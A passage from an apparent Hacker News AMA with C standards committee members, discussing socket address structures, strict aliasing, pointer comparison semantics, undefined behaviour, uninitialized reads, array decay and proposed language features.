          __int64_t       __ss_align;     /* force desired struct alignment */
          char            __ss_pad2[_SS_PAD2SIZE];
  };


struct sockaddr_storage is insufficient as well. A Unix domain socket path can be longer than `sizeof ((struct sockaddr_un){ 0}).sun_path`. That's a major reason why all the socket APIs take a separate socklen_t argument. Most people just assume that a domain socket path is limited to a relatively short string, but it's not (except possibly Minix, IIRC).


> A Unix domain socket path can be longer than `sizeof ((struct sockaddr_un){ 0}).sun_path`

Hm, I didn't realize this, or if I knew this I had forgotten. It makes sense because sun_path is usually pretty small, I believe 108 chars is the most common choice, and typically file paths are allowed to be much longer.

Do you have a citation for this behavior? I can't seem to find it, though I'm not looking very hard.

I guess you are right that any syscall taking a struct sockaddr * also has a length passed to it... Some systems have sa_len inside struct sockaddr to indicate length, but IIRC linux does not. I've often thought that length parameter was sort of redundant, because (1) some platforms have sa_len, and (2) even without that, you should be able to derive length from family. But your Unix domain socket example breaks (2). Without being able to do that, I start to imagine that the kernel would need to probe for NUL chars terminating the C string anytime it inspects a struct sockaddr_un, rather than block-copying the expected size of the structure -- that would be needlessly complicated.


So I just reran some tests on my existing VMs and it turns out I remembered wrong. Here's the actual break down:

* Solaris 11.4: .sun_path: 108; bind/connect path maximum: 1023. Length seems to be same as open. Interestingly, open path maximum seems to be 1023 (judged by trying ls -l /path/to/sock), although I always thought it was unbounded on Solaris.

* MacOS 10.14: .sun_path: 104, bind/connect path maximum: 253. Length can be bigger than .sun_path but less than open path limit.

* NetBSD 8.0: .sun_path: 104, bind/connect path maximum: 253. Same as MacOS.

* FreeBSD 12.0: .sun_path: 104, bind/connect path maximum: 104.

* OpenBSD 6.6: .sun_path: 104, bind/connect path maximum: 103 (104 - 1).

* Linux 5.4: .sun_path: 108, bind/connect path maximum: 108.

* AIX 7.1: .sun_path: 1023, bind/connect path maximum: 1023. Yes, .sun_path is statically sized to 1023! And like Solaris, open path maximum seems to be 1023 (as judged by trying ls -l /path/to/socket). Thanks to Polar Home, polarhome.com, for the free AIX shell account.

Note that all the above lengths are exclusive of NUL, and the passed socklen_t argument did not include a NUL terminator.

For posterity: on all these systems you can still create sockets with long paths, you just have to chdir or use bindat/connectat if available. My test code confirmed as much. And AFAICT getsockname/getpeername will only return the .sun_path path (if anything) used to bind or connect, but that's a more complex topic (see https://github.com/wahern/cqueues/blob/e3af1f63/PORTING.md#g...)


Linux also has the unusual extension of: if sun_path[0] is NUL, the path is not a filesystem path and the rest of the name buffer is an ID. I don't remember if that can have embedded NULs in that ID. I believe so.


I'm curious what exactly makes this undefined behavior.

And in particular, what about something like this?

    struct Foo {
    #ifdef __cplusplus
      int bar() const { return bar_; }
     private:
    #endif
      int bar_;
    };
Or, taking this a step further:

    struct _Foo;
    typedef struct _Foo Foo;

    // In C "struct _Foo" is never defined.
    int Foo_bar(const Foo* foo) { return *(int*)foo; }
    void Foo_setbar(Foo* foo) { *(int*)foo; }
    Foo* Foo_new() { return malloc(sizeof(int)); }

    #ifdef __cplusplus
    struct _Foo {
      void set_bar() { bar_ = bar; }
      int bar() const { return bar_; }
     private:
      int bar_;
    };
    #endif
The above isn't ideal but it does provide encapsulation in a way that doesn't seem to violate strict aliasing (the memory location is consistently read/written as "int").


I think this is plenty ok. For one thing, If a struct as a member of type T, it's ok to access it through a pointer to T (and also the address of the struct is guaranteed to be identical to the address of the first member). For another, you are using dynamically allocated memory, so the only thing that matters is the type of the pointer when the access is finally made. It doesn't matter that it was a Foo* before, if what you dereference is an int*.

This is different from pretending that the address of a struct s { int a; double b; } is the address of a struct t { int a; long long c; } and accessing it through a pointer to that. If you do that, C compilers will (given the opportunity) assume that the write-through-a-pointer-to-struct-t does not modify any object of type “struct s”. This is what the example st1 in the article illustrates.

The latter is what I suspect plenty of socket implementations still do (because there are several types of sockets, represented by different struct types with a common prefix). It is possible to revise them carefully so that they do not break the rules, but I doubt this work has been done.


The ability to use pointers to structures with a Common initial Sequence goes back at least to 1974--before unions were invented. When C89 was written, it would have been plausible that an implementation could uphold the Common Initial Sequence guarantees for pointers without upholding them for unions, but rather less plausible that implementations could do the reverse. Thus, the Standard explicitly specified that the guarantee is usable for unions, but saw no need to redundantly specify that it also worked for pointers.

If compilers would recognize that operation involving a pointer/lvalue that is freshly visibly based on another is an action that at least potentially involves the latter, that would be sufficient to make code that relies upon the CIS work. Unfortunately, some compilers are willfully blind to such things.


Yeah, the BSD socket API is kind of terrible like that. You could consider it an unspecified union type, or use memcpy() exclusively to access it safely.


Yeah, it depends on well agreed convention but which is ub according to the standard.


I assume you mean something like that:

    struct obj_impl {
        // real members
        ...
    };

    In public API header:

    struct obj {
        unsigned char _private[N]; // -- where N is the size of obj_impl
    };
I have seen such code too. It is also potentially error-prone. Certainly not advocating for it.


The ELF visibility attributes solve the part of the problem at the binary level (by hiding private library APIs from the application). The rest should be doable by structuring the project sources and headers in a suitable way.


ELF is very much not part of the C standard.


There are already "Name Spaces" in C and modules are actually object files or libraries.

You can spread components in as many object files or libraries as you wish.

IMHO it's not a C related problem but a code design one.

Write libraries (with headers) only if you need to share the code but if you're not sure about that just include it for your specific program.

There is no shame to include local files containing declarations and definitions.

I think it is a misconception from C programmers to write headers for local purpose.


1. How likely are named constants of any types to be included in C2x? I'm referring to the idea of making register const values be usable in constant expressions.

2. Is there, or was there ever a proposal to make struct types without a tag be structurally typed? This would not break backwards compatibility as far as I can see, and would make these types much more useful as ad-hoc bags of data. Small example:

  struct {size_t size; void *data;} data = get_data();
  int hash = hash_data(data);
I believe there was at least one proposal about error handling that more or less relied on the above to be valid semantically.

3. Is there any interest in making the variadic function interface a bit nicer to use? I would like to bring back an old feature and have an intrinsic to extract a pointer from the variadic parameter list, so that we can iterate over it ourselves (or even index directly).

  void *arg_ptr = va_ptr(last);
More out there would be a parameter that would be implicitly passed to a variadic function to indicate the number of arguments.

  void variadic(..., va_size count) {
  
  }

  variadic(10, 20, 30); // count would be three


(disclaimer: also a WG14 member)

1. I want this too.

2. Here is my proposal: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2366.pdf

3. Yes, variadic functions should be improved.


What is really missing from the C "aliasing" rules is a recognition that an access to a pointer/lvalue which is visibly freshly derived from another is, depending upon the form of derivation, either a definite or potential access to the former [in the former case, anything that couldn't be accessed by the original couldn't be accessed by the derived pointer/lvalue; in the latter case, the derived pointer/lvalue might access things the original could not].

I think the authors of C89 most likely thought that principle was sufficiently obvious that there was no need to expressly state it. Were it not for the Standard's rule forbidding it, an implementation might plausibly have ignored the possibility of an `int` being accessed via an `unsigned`, but I don't think the authors of the Standard imagined that a non-obtuse compiler writer wouldn't allow for the possibility that something like:

    void inc_float_bits(float *f)
    {
      ((unsigned*)f)+=1;
    }
might affect the stored value of a `float`.

The present rules, as written, have absurd corner cases. Given something like:

    union U { float f[2]; unsigned ui[2]; } uu;
the Standard would, so far as I can tell, treat as identical the functions test1, test2, and test3 below:

    float test1(int i, int j)
    {
      uu.f[i] = 1.0f;
      uu.ui[j] += 1;
      return uu.f[i];
    }

    float test2(int i, int j)
    {
      *(uu.f+i) = 1.0f;
      *(uu.ui+j) += 1;
      return *(uu.f+i);
    }

    float evil(unsigned *ui, float *f)
    { *f = 1.0f; *ui += 1; return *f; }

    int test2(int i, int j)
    {
      evil(uu.f+i, uu.ui+j);
    }
If a dereferenced pointer to union member type isn't allowed to access the union, the first example would be UB regardless of i and j, but that would imply that non-character arrays within unions are meaningless. If such pointers are allowed to access union objects, then test2 (and the evil function within it) would have defined behavior even when i and j are both zero.

BTW, I think any quality compiler should recognize the possiblity of type punning in the first two, though the Standard doesn't actually require either. Neither clang or gcc, however, recognizes the possibility of type punning in the second even though the behavior of the [] operators in the first are defined* as equivalent to the second.


I'd expect a proposal for (1) to be well received. The only proposal I recall that deals with (2) is http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2067.pdf. I think it's still being discussed. (3) is highly unlikely if it involved ABI changes. Even if it could be done without such changes unless there is a precedent for it in an existing compiler (and preferably more), it would likely be a tough sell.


Is the linked proposal really dealing with unnamed struct types? I skimmed it and it seems like it is dealing with named constants. Also, is there a proposal for (1) currently, or is someone planning on writing one? Regarding (3), yes, this one was mostly wishful thinking.


3. would have to be a new mechanism for variadic functions, that would have to be distinguished in header files from the old mechanism with which it is incompatible. So this proposal would imply some new keyword or syntax. I am not in the committee, but I don't think this is going to happen. The improvement is way too incremental to force a new syntax.

(The committee is fine with incremental improvements, but new syntax need to have strong motivation behind it, much stronger than this.)


Yes, I know that this is the most disruptive out of the three. The implicit parameter more so than the va_ptr() intrinsic (in my opinion), but I understand that changes like these are not very well motivated (except for a slightly nicer developer experience).


I have incorporated the following macro abuse to prepend the number of arguments to a variadic functions into my projects: https://gist.github.com/61131/7a22ac46062ee292c2c8bd6d883d28.... It does introduce some overhead, but it suits my needs for the projects that I am working on.

That being said, I would like it if the default types for variadic functions were promoted from int/float to int64_t/double in order to be more reflective of the wider ranges supported by these types.


Many of your remaining questions have devolved into "When will I see my favorite feature xyz appear in the C Standard?" The answer in most cases is "that depends on how long it takes you to submit a proposal". Take a look at http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log... for previous proposals and review the minutes to see which proposals have been adopted. In general, the committee is not going to adopt proposals for which there is insufficient existing practice or haven't been fully thought out. There are cases where people have come to a single meeting with a well-considered proposal that was adopted into the C Standard. I wrote about one such case here: https://www.linkedin.com/pulse/alignment-requirements-memory... Alternatively, you can approach someone on the committee and ask us to champion a proposal for you. It is likely that we'll agree or at least provide you with feedback on your proposal.


Thanks to one and all for this AMA! The massive number of comments testifies to the continuing interest in C, and I think we're all grateful to all of you for your expertise, your patience, and your even-handed responses.


Is the present purpose of the Standard to:

1. define a highly-extensible abstraction model, which implementations intended for various purposes should be expected to extend to suit those purpose, or

2. define an abstraction model which is sufficiently complete that programs can do everything that would need to be done, without need for extensions?

Reading the C89 and C99 Rationale documents, it's clear that those standards were intended to meet the former purpose. The way some compilers treat "Undefined Behavior", however, suggests that the maintainers view the Standard as aimed toward the latter purpose.

During the 1980s and 1990s, it was generally cheaper and easier for implementations to extend the Standard's abstraction model by specifying that many actions would be processed "in a documented fashion characteristic of the environment" than it would have been to do anything else, so there was no need to worry about whether the Standard allowed programmers to specify when such behavior was required. That no longer holds true, however.

While it would be reasonable to deprecate code which relies upon such treatment without explicitly demanding it, such deprecation would only make sense if there were a means of demanding such treatment when required. For the Committee to provide such means, however, it would have to reach a consensus as to the purposes for which the Standard's abstraction model is meant to be suitable. Are you aware of any such consensus?


I don't know if you saw my question right below, since I guess I replied to the wrong post, but I'd be really interested to know how you view the purpose of the Standard. For years, the language has been caught in a catch-22 where the authors of the Standard have seen no need to have it recognize constructs that compilers have, almost unanimously, processed usefully for years without being required to do so, but some compiler maintainers interpret the failure to mandate such constructs as deprecation.

I would like to see the Standard either rewritten in such a way as to actually define (sometimes as optional features) everything necessary to make an implementation suitable for a wide range of tasks, or else expressly state that, e.g. "There are some circumstances where the behavior of some action would documented by parts of the Standard, the documentation of the implementation and execution environment, or other materials, but some other portions of the Standard would characterize those actions as invoking Undefined Behavior. This Standard expressly waives jurisdiction in such cases so as to allow implementations designed for a variety of purposes to process them in whatever fashion would best suit those purposes."

What would you think about including something like those last two sentences in the Standard, so as to help clarify its intention?


What do you think about Zig language [0] and if you have any opinions on it, what distinguishing features would you like to see adopted in the C world?

[0] https://ziglang.org/


Not about the language exactly, so maybe not fair game, but: how did you all find yourselves joining ISO? And maybe more generally, what's the path for someone like a regular old software engineer to come to participate in the standardization process for something as significant and ubiquitous as the C programming language?


Great question!

Joining the committee requires you to be a member of your country's national body group (in the US, that's INCITS) and attend at least some percentage of the official committee meetings, and that's about it. So membership is not difficult, but it can be expensive. Many committee members are sponsored by their employers for this reason, but there's no requirement that you represent a company.

I joined the committees because I have a personal desire to reduce the amount of time it takes developers to find the bugs in their code, and one great way to reduce that is to design features to make harder to write the bugs in the first place, or to turn unbounded undefined behavior into something more manageable. Others join because they have specific features they want to see adopted or want to lend their domain expertise in some area to the committee.


Related to that: C++ standards body seems to be quite open allowing non-members to participate (outside official votes, while respecting them when looking for consensus) is it just due to my limited observation or is the C group less open? Any plans in that regard?


Most of us on the committee would like to see more participation from other experts. The committee's mailing list should be open even to non-members. Attendance by non-members at meetings might require an informal invitation (I imagine a heads up to the convener should do it).


I think that's right. These days, much of the discussion occurs through study subgroups (like the floating-point guys) and the committee e-mailing list.


I would love to see more open interactions between the broader C community and the WG14 committee. One of the plans I am currently working on is an update to the committee's webpage to at least make it more obvious as to how you can get involved. The page isn't ready to go live yet, but will hopefully be in shape soon.


A few years ago I came across this article Pointers Are More Abstract Than You Might Expect In C [1].

I followed the article which attempted to interpret the C standard and come to a conclusion. The conclusion is:

> The takeaway message is that pointer arithmetic is only defined for pointers pointing into array objects or one past the last element. Comparing pointers for equality is defined if both pointers are derived from the same (multidimensional) array object. Thus, if two pointers point to different array objects, then these array objects must be subaggregates of the same multidimensional array object in order to compare them. Otherwise this leads to undefined behavior.

Based on the above, I arrived at the conclusion after reading this that comparing two distinct malloc()'d pointers for equality itself is undefined behaviour since malloc() is likely to return pointers to distinct objects that are not part of a sub-aggregate object.

I know this is incorrect, but I don't know why I'm wrong.

[1]: https://stefansf.de/post/pointers-are-more-abstract-than-you...


The only thing that is not defined is comparing a pointer one-past-the-end to a pointer to the very beginning of a toplevel object. Apart from this rule, pointers of course do not need to be derived from the same object in order to be compared with == and !=.

&a + 1 == &b is unspecified: it may produce 0 or 1, and it may not produce the same result if you evaluate it several times.

Similarly, if both the char pointers p and q were obtained with malloc(10), after they have been tested for NULL, all these operations are valid:

  p == q (false)
  p + 1 == q (false)
  p + 1 == q + 1 (false)
  p + 10 == q + 1 (false)
Only p+10 == q and p == q+10 are unspecified (of the comparisons that can be built without invoking UB during the pointer arithmetic itself).

I have no idea what led that person to (apparently) write that &a==&b is undefined. This is plain wrong. I do not see any ambiguity in the relevant clause (https://port70.net/~nsz/c/c11/n1570.html#6.5.9p6 ). Yes, the standard is in English and natural languages are ambiguous, but you might as well claim that a+b is undefined because the standard does not define what the word “sum” means (https://port70.net/~nsz/c/c11/n1570.html#6.5.6p5 ).


That’s quite precise, can you give a sense of why it’s useful to have? Does it translate as “you can never know whether two mallocs are adjacent, so don’t even try merging them”?


One concrete reason why “unspecified” means “anything and not always the same thing” is to enable the maximum of optimizations.

Write a function c that compares pointers in a compilation unit, and in another compilation using, define:

    int a, b;
    X1 = (&a == &b + 1);
    X2 = c(&a, &b + 1);
The compiler can optimize the computation of X1 on the basis that comparing an offset of &a to an offset of &b will always:

  - be false
  - or invoke undefined behavior
  - or be unspecified
But the optimization will not apply to the computation of X2, so the two variables X1 and X2 can receive different values when you execute this example, although they appear to compute the same thing.


I get why unspecified means that and it’s good to know what the limit is for applying an optimisation, but I was asking about why the specific comparison of “one past the end” with the beginning of another being unspecified would be useful. It’s cool you can optimise it out, but what does a compiler gain from being able to do that?

Imagine a standard stated that > and < character comparisons involving '%' were unspecified. Why would this be good? It wouldn’t, so it’s not in any standard. But specifically it wouldn’t because (a) nobody writes ch < '%', and (b) if they did, compilers couldn’t make programs any faster, more portable, etc, because of its inclusion.

I guessed above that this is kinda like having hashmaps iterate in a random order: compilers do spooky things when you try to check whether two allocas/mallocs are adjacent, so don’t do it. Is that accurate? Or does it mean that compilers can move things around on the stack if they want, without worrying about updating the registers or locations that store the pointers, i.e. this is mainly to make compilers easier to write? If it’s that, I imagine I would want some other pointer comparisons on the list. The reason it’s in there is what I wanted you to shed some light on.


Oh, that was your question. In this case, the reason why &a + 1 == &b is unspecified is that:

- it's generally false—there is no reason for b to be just after a in memory, so these two addresses compare different.

- it is sometimes true: when addresses are implemented as integers, and compilers use exactly sizeof(T) bytes to represent an object of type T, and do not waste precious integers by leaving gaps between objects, and == between pointers is implemented as the assembly instruction that compares integers, sometimes that instruction produces true for &a + 1 == &b, because b was placed just after a in memory.

In short, &a + 1 == &b was made unspecified so that compilers could implement pointer == by the integer equality instruction, and could place objects in memory without having to leave gaps between them. Anything more specific (such as “&a + 1 == &b is always false”) would have forced compilers to take additional measures against providing the wrong answer.


Why is this undefined if it’s all just pointers to addresses in memory, regardless if the memory is valid for that object or not?


Here is an example I have at hand that shows that when you are using an optimizing compiler, there is no such thing as “just pointers to addresses in memory”. There are plenty more examples, but I do not have the other ones at hand.

https://gcc.godbolt.org/z/Budx3n


Please correct me if I am wrong, but I think here the optimization is possible because "* p = 2" is UB, because the compiler can assume that "p" points to invalid memory. For this assumption, the compiler must know that "realloc" invalidates its first argument.

How does it know that? The definition of "realloc" lives in the source of "libc.so", so the compiler should not be able to see into it. Its declaration in "malloc.h" does not have any special attributes. Does the standard and/or the compiler handles "realloc" differently from other functions?

edit:

It looks like clang inserts a "noalias" attribute to the declaration of "realloc" in the LLVM IR, so it seems it does handle "realloc" specially.

    declare dso_local noalias i8* @realloc(i8* nocapture, i64) local_unnamed_addr #3


I would guess that it is because it gives some freedom to the compiler. e.g. If you have two pointers 'foo' and 'bar' that point to two separate structures (e.g. two arrays of ints), the compiler can always assume that the pointers, even with some adds/subtracts, will never 'collide', i.e. foo will never == bar, regardless of their relative memory positions.


Pointer equality (the == and != operators) is well defined for any pointers (of the same type) to any objects.

Relational operators (< <= > >=) on pointers have undefined behavior unless both pointers point to elements of the same array object or just past the end of it. A single non-array object is treated as a 1-element array for this purpose.

(That's for object pointers. Function pointers can be compared for equality, but relational operators on function pointers are invalid.)


Does the following code fragment cause undefined behaviour?

    unsigned int x;
    x -= x;
 
There's a lengthy StackOverflow thread where various C language-lawyers disagree on what the spec has to say about trap values, and under what circumstances reading an uninitialised variable causes UB. I'd appreciate an authoritative answer. Thanks for dropping by on HN!

https://stackoverflow.com/q/11962457/


Yes, it's undefined. It involves a read of an uninitialized local variable. Except for the special case of unsigned char, any uninitialized read is undefined.


>Except for the special case of unsigned char, any uninitialized read is undefined.

Could you expand on this?


An object of any type, initialized or not, can be read by an lvalue of unsigned char (or any character type). That lets functions like memcpy (either the standard one or a hand-rolled loop) copy arbitrary chunks of memory.

There's some debate about the effects of reading an uninitialized local variable of unsigned char (like whether the same value must be read each time, or whether it's okay for each read to yield a different value).

This special exemption doesn't extend to any other types, regardless of whether or not they have padding bits or trap representations that could cause the read to trap. Few types do, yet the behavior of uninitialized reads in existing implementations is demonstrably undefined (inconsistent or contradictory to invariants expressed in the code of a test case), so any subtleties one might derive from the text of the standard must be viewed in that light.


Thanks for your answers. A related question: this article [0] appears to single out memcpy and memmove as being special regarding effective type. Is it accurate? It seems to be at odds with your suggestion that there's nothing stopping me writing my own memcpy provided I'm careful to use the right types.

[0] https://en.cppreference.com/w/c/language/object#Effective_ty...


I think that may be inaccurate -- IIRC, in C, you can do type punning via a union but not memcpy, and in C++ you can do type punning via memcpy but not a union and this incompatibility drives me nuts because it makes inline functions in a header file shared between C and C++ really messy. (Moral of the story: don't pun types.)


The C standard also allows to use memcpy to do type punning:

    If a value is copied into an object having no declared type using memcpy or memmove,
    or is copied as an array of character type, then the effective type of the modified
    object for that access and for subsequent accesses that do not modify the value is
    the effective type of the object from which the value is copied, if it has one
Simply memcpy into a variable (as opposed to dynamically allocated memory).

https://port70.net/~nsz/c/c11/n1570.html#6.5p6


I must be remembering incorrectly then, thank you!


memcpy and memmove aren't special. The part that discusses the copying of allocated objects is 6.5, p6, quoted below:

The effective type of an object for an access to its stored value is the declared type of the object, if any. If a value is stored into an object having no declared type through an lvalue having a type that is not a character type, then the type of the lvalue becomes the effective type of the object for that access and for subsequent accesses that do not modify the stored value. If a value is copied into an object having no declared type using memcpy or memmove, or is copied as an array of character type, then the effective type of the modified object for that access and for subsequent accesses that do not modify the value is the effective type of the object from which the value is opied, if it has one. For all other accesses to an object having no declared type, the effective type of the object is simply the type of the lvalue used for the access.


I see, so in short the article is failing to reflect this excerpt: or is copied as an array of character type. Thanks again.


Has there ever been any consensus as to what that "...or is copied as an array of character type..." text is supposed to mean, or what sort of hoops must be jumped through for a strictly conforming program to generate an object whose bit pattern matches another without copying the effective type thereof?



I'm guessing you were asking about this part rather than UB in general:

> Except for the special case of unsigned char,

The SO article makes the bizarre claim that because

(1) an unsigned char, per the standard, cannot have any padding bits, it therefore cannot have a trap representation. And

(2) if it cannot have a trap representation, the use of an uninitialized value isn't undefined.

I'm willing to buy (1) but I don't remember (2) being required for UB. I think (2) is the step that is harder to follow intuitively. Admittedly, I have not read that part of the standard closely in some time.


This example is clearly UB.

You could argue that it suddenly becomes less UB if you take the address of x:

  unsigned int x;
  &x;
  x -= x;
I'm not sure if this will add anything to the discussion on SO, but if you allow programs to do this, then after applying modern optimizing C compilers, you may end with multiplications by 2 that produce odd results, or uninitialized char variables that contain 500: http://blog.frama-c.com/index.php?post/2013/03/13/indetermin...

So the short answer is that, for all intent and purposes, you should consider use of uninitialized variables as UB, because C compilers already do. (There exists somewhere a document clarifying what C compilers can and cannot do with indeterminate values. A search for “wobbly values” might turn it up. Anyway, you do not want to have wobbly values in your C programs any more than you want it to have undefined behavior.)


Interesting link, thanks. So then:

* Under C90, reading an uninitialized local was explicitly listed as UB.

* Under C99, if you weren't using a character type, it was still essentially UB, by way of trap values. (I don't think the particulars of the target hardware platform are relevant.)

* C11 reintroduced UB even for some cases involving character types. We were already invoking UB under C99, so we know we're still invoking UB under C11.

> You could argue that it suddenly becomes less UB if you take the address of x

I don't think so. As we're not using a character type, I don't think taking its address would change anything. This aligns with what msebor said.

Lastly, from the article:

    > No, GCC is still acting as if j *= 2; was undefined.
I think GCC's behaviour is legal here. The target platform may have no trap values, but I don't see that GCC is prohibited from behaving as if there are. It would be legal (albeit bizarre) for it to generate code for a completely different ISA, and to bundle an emulator. If the spec says you've opened the door to UB, then unless your compiler documentation says otherwise, it's permitted to generate code that goes haywire, no?


I wrote about a simple addition to C that could eliminate most buffer overflows:

https://www.digitalmars.com/articles/C-biggest-mistake.html

I.e. offering a way that arrays won't automatically decay to pointers when passed as a function parameter.


Arrays are pointers. If they aren't pointers then you need to copy the data when you are giving an array as a function parameter. that's a lot slower. Being able to prepare an set of data in an array and then giving a pointer to a function is very useful. You could add a second type of array on top of what you have in C that includes more stuff, but if that's what you want you can implement that yourself with a struct.


An array is not a pointer. These are completely different data types. For example, you can't apply pointer arithmetic to arrays without casting them to pointers.


That's right. They are converted to pointers when passed to a function, even if the function declares the parameter as an array.


They're not converted but can be implicitly casted to pointer types.


No, they're converted. There is no such thing as an "implicit cast". And it's not specific to arguments in function calls.

Array types and pointer types are distinct.

An expression of array type is, in most but not all contexts, implicitly converted (really more of a compile-time adjustment) to an expression of pointer type that yields the address of the 0th element of the array object. The exceptions are when the array expression is the operand of a unary & (address-of) or sizeof operator, or when it's a string literal in an initializer used to initialize an array (sub)object. (The N1570 draft incorrectly lists _Alignof as another exception. In fact, _Alignof can only take a parenthesized type name as its operand.)

If you do:

    int arr[10];
    some_func(arr);
then arr is "converted" to the equivalent of &arr[0] -- not because it's an argument in a function call, but because it's not in one of the three contexts listed above in which the conversion doesn't take place.

Another rule that causes confusion here is that if you define a function parameter with an array type, it's treated as a pointer parameter. For example, these declarations are exactly equivalent:

    void func(int arr[]);
    void func(int arr[42]); // the 42 is quietly ignored
    void func(int *arr);
Suggested reading: http://www.c-faq.com/, particularly section 6, "Arrays and Pointers".

A conversion converts a value of one type to another type (possibly the same one). The term "cast" refers only to an explicit conversion, one specified by a cast operator (a parenthesized type name preceding the expression to be converted, like "(double)42"). An implicit conversion is one that isn't specified by a cast operator.


A little-known but useful C feature is static array indices, as in:

  void foo(int array[static 42]);
which means you can't pass in an array of less than 42 elements (and the compiler can warn you if it notices you are).


Sure you can. int aFoo[]; has many legal array operations possible:

  *(aFoo+3) should work fine and return the 4th int in the array.


I think your star operator there is making the compiler cast your array to pointer implicitly.


Its all symbols, so you can say whatever. But if it looks like a pointer, walks like a pointer, and quacks like a pointer, Its A Pointer.


they are accessed using pointer arithmetic, if you wanted them to contain length data, you would need a different access pattern. I think one of the great features of C is that it doesn't do anything under the hood, its all explicit. If you want to bounds check, then do it.


> they are accessed using pointer arithmetic

Not always. Consider:

    int a[3];
    a[1] = 2;
This is not using pointer arithmetic. Dump the generated code if you don't believe me :-)


Its still pointer arithmetic, its just done compile time rather then at execution. Still, you deserve style points :-)


Tell that to

  mov DWORD PTR [rsp - 8], 2


C currently replaces my use of an array with a pointer. This sucks, because I'd have taken the address if I wanted that.

Your proposal replaces my use of an array with two things, a pointer (as before) and a length. This is not too helpful, because I already could have done that if I'd wanted to.

What is missing is the ability to pass an array. Sometimes I want to toss a few megabytes on the stack. Don't stop me. I should be able to do that. The called function then has a copy of the original array that it can modify without mangling the original array in the caller.


> Your proposal replaces my use of an array with two things, a pointer (as before) and a length. This is not too helpful, because I already could have done that if I'd wanted to.

C doesn't have a reasonable way of doing that. I know my proposal works, because we've been using it in D for 20 years.


Your proposal does not work, at least when making the declarations binary compatible with older code.

Note that C is a pass-by-value language, so passing an array means that the called function can modify the content without the modifications being seen in the caller.

To sort of pass arrays in an ABI-compatible way, the version for older code would require putting the array inside a struct.

Even that doesn't fully work with any ABI that I've ever heard of. The struct doesn't really get passed. Disassemble the code if you have doubts. The caller allocates space for the struct, copies the struct there, and then passes a pointer to the struct. From the high-level view of the language, this is passing the struct, but the low level details are actually wrong.


A lot of you seem to be working on commercial solutions to C's insecurity. Does this feel like a conflict of interest to you?


Good question, but not at all! I've been working as hard as I can for the past 15 years to improve C Language security as have other security-minded members of the committee. Generally speaking, we are in the minority as performance is still the major driver for the language. Any security solution that introduces > 5% overhead, for example, is a nonstarter. I think we all understand that are jobs are completely safe no matter what security improvements we can get adopted.

The committee works a lot lobbyist. A minority of people with a large financial interest in the technology (such as compiler writers) have undue influence because they participate in the process. I always encourage C language users to take a more active role, but they usually don't. Cisco is an example of user community that actively takes part in C Standardization.


I guess this is why vendors like Apple, Oracle, ARM and Google end up going the hardware memory tagging route instead.


I have been told in this very AMA that I lacked enthusiasm about C (and the gratuitous insecurity of the language when we know that a well-designed type system and a few runtime checks solve the problem entirely is indeed the reason for my perceived lack of enthusiasm): https://news.ycombinator.com/item?id=22865912

I hope that this perceived lack of enthusiasm means I am handling the conflict of interest honorably.


When will C gain a mechanism for "do not leave this sensitive information laying around after this function returns"? We have memset_s but that doesn't help when the compiler copies data into registers or onto the stack.


This is an entire language extension, as you note. The last time various people interested in this were in the same room (it was in January 2020 in a workgroup called HACS), what emerged was that the Rust people would try to add the “secret” keyword to the language first, since their language is still more agile than C, while the LLVM people would prepare LLVM for the arrival of at least one front-end that understand secret data.

Is this enough to answer your question? I can look up the names of the people that were involved and communicate them privately if you are further interested.


Also worth noting that a language extension may not be sufficient for all cases. E.g. the OS stores register state on a context switch; do you also need a flag for the system to zero any memory used for this purpose following the state restore, or is it OK to trust that it won’t leak through some mechanism? For some applications, there may be contractual or regulatory requirements to have an erasing mechanism for copies like this as well.


I want to use this in the OS kernel too. ;-)


Thanks for the update. I was encouraging some of the people who were going to be at HACS to address this but I hadn't heard the latest progress. Unfortunately I couldn't be there myself.


If I remember correctly, Chandler was the one writing down the draft for LLVM developers to comment on LLVM-side. Unfortunately, if you Google his name and the relevant keywords, the results are full of his work on speculative load hardening.

Someone who read the LLVM mailing-list attentively should have seen it and may have a link.


(Not OP) I would appreciate any references you can provide. An LLVM __attribute__((secret)) would be a great place to start.


Unfortunately I am out of useful information:

https://news.ycombinator.com/item?id=22868999

I hope someone will provide the next link.


1. Are there any plans for standardizing empty initializer lists?

    struct foo { int a; void *p; };

    struct foo f = {0}; // legal C, f->p initialized like a static variable
    struct foo f = {}; // not legal but supported by gcc
To me it would make sense that there is no need to specify a value for any of the members that are intended to be initialized exactly like static variables (and the first member is not special so I shouldn't have to explicitly assign a zero?). However the syntax currently demands at least one initializer.

--

2. I recall seeing a proposal for allowing declarations after case labels:

    switch (foo) {
    case 1:
        int var;
        // ...
    }
This is currently not allowed and you'd have to wrap the lines after case in braces, or insert a semicolon after the case label. Is this making it to c2x?

--

3. I've run into some recent controversy w.r.t. having multiple functions called main (and this has come up in production code). In particular, I ran into a program programs that has a static main() function (with parameters that are not void or int and char[]), which is not intended to be the* main function that is the program's entry point.

gcc warns about this because the parameters disagree with what's prescribed for the program entry point. It's not clear to me whether this is intended to be legal or not.

--

4. Looking at the requirements for main brings up another question: it says how main should be defined (no static or extern keyword). However, the definition could be preceded by a static declaration, which then affects the definition that follows:

If the declaration of an identifier for a function has no storage-class specifier, its linkage is determined exactly as if it were declared with the storage-class specifier extern.

For an identifier declared with the storage-class specifier extern in a scope in which a prior declaration of that identifier is visible, if the prior declaration specifies internal or external linkage, the linkage of the identifier at the later declaration is the same as the linkage specified at the prior declaration.

Therefore, it is possible to have a main function with internal linkage and a definition that exactly matches the one given in the spec:

    static int main(int, char *[]);

    int main(int argc, char *argv[]) { /* ... */ }
As one might guess, this program doesn't make it through the linker when compiled with gcc. Is this supposed to be legal? Should the spec perhaps require main to have external linkage, and then allow other functions called main with internal linkage (and parameters that do not match what is required of the external one)?

EDIT: ---

Are the fixes w.r.t. reserved identifiers going to make it in c2x? Can I finally have a function called toilet() without undefined behavior?


I'd love your opinion on the abundance of "undefined behaviour" (as opposed to implementation-defined, or some new incantation such as "unknown result in variable but system is safe") for relatively trivial things such as signed (but not unsigned) integer overflows. I've heard that this is to allow for non-twos-complement implementations. However, in practice, you notice that most people use ugly workarounds which lead to ugly code that (because of e.g. casting to unsigned and allowing the same overflow to happen anyway) only work correctly on twos-complement anyway. Is this intended to be addressed in the future in some way?


> (because of e.g. casting to unsigned and allowing the same overflow to happen anyway) only work correctly on twos-complement anyway

Unsigned arithmetic never overflows, and guarantees two's-complement behavior, because unsigned arithmetic is always carried out modulo 2^n:

